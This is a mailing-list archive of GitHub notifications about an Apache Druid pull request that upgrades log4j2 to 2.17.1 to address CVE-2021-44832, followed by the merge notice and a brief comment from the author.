You are viewing a plain text version of this content. The canonical link for it is here.
Posted to commits@druid.apache.org by GitBox <gi...@apache.org> on 2021/12/30 01:00:06 UTC
[GitHub] [druid] FrankChen021 opened a new pull request #12106: update log4j2 to 2.17.1
FrankChen021 opened a new pull request #12106:
URL: https://github.com/apache/druid/pull/12106
Fixes the latest vulnerability (44832) which also affects its prior release 2.17.0 that is being use by Druid on master branch.
This vulnerability allows RCE for attackers by constructing malicious code for log4j JDBC appender. Druid's default configuration does not use this kind of appender, is not affected.
### Description
https://logging.apache.org/log4j/2.x/security.html#CVE-2021-44832
This PR has:
- [X] been self-reviewed.
- [ ] using the [concurrency checklist](https://github.com/apache/druid/blob/master/dev/code-review/concurrency.md) (Remove this item if the PR doesn't have any relation to concurrency.)
- [ ] added documentation for new or modified features or behaviors.
- [ ] added Javadocs for most classes and all non-trivial methods. Linked related entities via Javadoc links.
- [ ] added or updated version, license, or notice information in [licenses.yaml](https://github.com/apache/druid/blob/master/dev/license.md)
- [ ] added comments explaining the "why" and the intent of the code wherever would not be obvious for an unfamiliar reader.
- [ ] added unit tests or modified existing tests to cover new code paths, ensuring the threshold for [code coverage](https://github.com/apache/druid/blob/master/dev/code-review/code-coverage.md) is met.
- [ ] added integration tests.
- [ ] been tested in a test Druid cluster.
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscribe@druid.apache.org
For queries about this service, please contact Infrastructure at:
users@infra.apache.org
---------------------------------------------------------------------
To unsubscribe, e-mail: commits-unsubscribe@druid.apache.org
For additional commands, e-mail: commits-help@druid.apache.org
[GitHub] [druid] gianm merged pull request #12106: update log4j2 to 2.17.1
Posted by GitBox <gi...@apache.org>.
gianm merged pull request #12106:
URL: https://github.com/apache/druid/pull/12106
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscribe@druid.apache.org
For queries about this service, please contact Infrastructure at:
users@infra.apache.org
---------------------------------------------------------------------
To unsubscribe, e-mail: commits-unsubscribe@druid.apache.org
For additional commands, e-mail: commits-help@druid.apache.org
[GitHub] [druid] FrankChen021 commented on pull request #12106: update log4j2 to 2.17.1
Posted by GitBox <gi...@apache.org>.
FrankChen021 commented on pull request #12106:
URL: https://github.com/apache/druid/pull/12106#issuecomment-1002830895
This is the 4th update since the first CVE announced earlier in this month. To be honest, I'm tired of such thing. Hope there won't be any vulnerability in log4j in the upcoming new year which will give all of us a relief.
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscribe@druid.apache.org
For queries about this service, please contact Infrastructure at:
users@infra.apache.org
---------------------------------------------------------------------
To unsubscribe, e-mail: commits-unsubscribe@druid.apache.org
For additional commands, e-mail: commits-help@druid.apache.org